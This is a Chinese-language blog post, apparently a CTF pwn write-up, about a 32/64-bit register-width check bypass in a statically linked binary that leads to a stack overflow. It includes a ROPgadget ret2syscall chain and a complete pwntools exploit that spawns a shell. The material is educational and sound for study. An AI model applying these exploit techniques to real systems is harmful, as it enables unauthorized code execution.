K's House
Home
Archives
Tags
Categories
Link
About
avatar
文章
126
标签
67
分类
30
Home
Archives
Tags
Categories
Link
About
目录
  1. 1. 由寄存器位数差异引发的漏洞利用
    1. 1.1. 安全检查
    2. 1.2. IDA分析
    3. 1.3. exp
由寄存器位数差异引发的漏洞利用
|Pwn
字数总计:1.8k|阅读时长: 10 分钟
|阅读量:|评论数:

由寄存器位数差异引发的漏洞利用

Code
|63..32|31..16|15-8|7-0|
               |AH.|AL.|
               |AX.....|
       |EAX............|
|RAX...................|

以上是16,32,64位寄存器的大小。

安全检查

Code
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

IDA分析

image.png

可见有一处花指令,先nop掉看逻辑

image.png

image.png

要求输入小于等于10也就是0xA,否则程序退出。

查看汇编

image.png

可以发现

Code
eax               0000 000a
rax     0000 0000 0000 000a
rax     0000 0001 0000 000a    构造成这样也可以通过

cmp指令的隐含操作为 op1-op2判断是否等于0。因此可触发类似整数溢出的漏洞。

于是如果我们构造 0x1 0000 0009 - 0xa 就会将eax内容变为 0xffff ffff,从而在后面的read name可以读大量字节,造成栈溢出。

使用file命令查看发现程序为静态链接

Code
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=c69a6b123774b6c538eb99551edd57bc703c32f9, not stripped

且程序内有syscall,因此直接使用ret2syscall进行ROP。

对于这道题来说,即可以手工构造给syscall传参,也可以使用 ROPgadget直接生成利用链

Code
ROPgadget --binary intoverflow --ropchain

直接生成如下

python
ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

	[+] Gadget found: 0x47c601 mov qword ptr [rsi], rax ; ret
	[+] Gadget found: 0x4017b7 pop rsi ; ret
	[+] Gadget found: 0x480956 pop rax ; pop rdx ; pop rbx ; ret
	[+] Gadget found: 0x42660f xor rax, rax ; ret

- Step 2 -- Init syscall number gadgets

	[+] Gadget found: 0x42660f xor rax, rax ; ret
	[+] Gadget found: 0x46ea20 add rax, 1 ; ret
	[+] Gadget found: 0x46ea21 add eax, 1 ; ret

- Step 3 -- Init syscall arguments gadgets

	[+] Gadget found: 0x401696 pop rdi ; ret
	[+] Gadget found: 0x4017b7 pop rsi ; ret
	[+] Gadget found: 0x442e46 pop rdx ; ret

- Step 4 -- Syscall gadget

	[+] Gadget found: 0x4003da syscall

- Step 5 -- Build the ROP chain

	#!/usr/bin/env python2
	# execve generated by ROPgadget

	from struct import pack

	# Padding goes here
	p = ''

	p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
	p += pack('<Q', 0x00000000006ca080) # @ .data
	p += pack('<Q', 0x0000000000480956) # pop rax ; pop rdx ; pop rbx ; ret
	p += '/bin//sh'
	p += pack('<Q', 0x4141414141414141) # padding
	p += pack('<Q', 0x4141414141414141) # padding
	p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
	p += pack('<Q', 0x00000000006ca088) # @ .data + 8
	p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
	p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x0000000000401696) # pop rdi ; ret
	p += pack('<Q', 0x00000000006ca080) # @ .data
	p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
	p += pack('<Q', 0x00000000006ca088) # @ .data + 8
	p += pack('<Q', 0x0000000000442e46) # pop rdx ; ret
	p += pack('<Q', 0x00000000006ca088) # @ .data + 8
	p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
	p += pack('<Q', 0x00000000004003da) # syscall

于是利用思路如下:

  1. 输入构造的数字使read参数极大
  2. 填充到retn位置
  3. 填充rop利用链

exp

python
from pwn import *
from struct import pack
p=process('./intoverflow')

payload='a'*88
payload += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
payload += pack('<Q', 0x00000000006ca080) # @ .data
payload += pack('<Q', 0x0000000000480956) # pop rax ; pop rdx ; pop rbx ; ret
payload += '/bin//sh'
payload += pack('<Q', 0x4141414141414141) # padding
payload += pack('<Q', 0x4141414141414141) # padding
payload += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
payload += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
payload += pack('<Q', 0x00000000006ca088) # @ .data + 8
payload += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
payload += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
payload += pack('<Q', 0x0000000000401696) # pop rdi ; ret
payload += pack('<Q', 0x00000000006ca080) # @ .data
payload += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
payload += pack('<Q', 0x00000000006ca088) # @ .data + 8
payload += pack('<Q', 0x0000000000442e46) # pop rdx ; ret
payload += pack('<Q', 0x00000000006ca088) # @ .data + 8
payload += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x00000000004003da) # syscall

p.recvuntil('Plz Input Your weight(kg):\n> ')
p.sendline('4294967290')
p.recvuntil('Good! what\'s your name??\n> ')
p.sendline(payload)

p.interactive()
文章作者: kabeor
文章链接: https://kabeor.github.io/%E7%94%B1%E5%AF%84%E5%AD%98%E5%99%A8%E4%BD%8D%E6%95%B0%E5%B7%AE%E5%BC%82%E5%BC%95%E5%8F%91%E7%9A%84%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 K's House
Pwn
相关推荐
2020-01-25
2020HGAME Week1 Pwn WP
2020-02-08
2020HGAME Week2 WP
2019-12-31
CVE-2010-2553 CVDecompress堆溢出分析
评论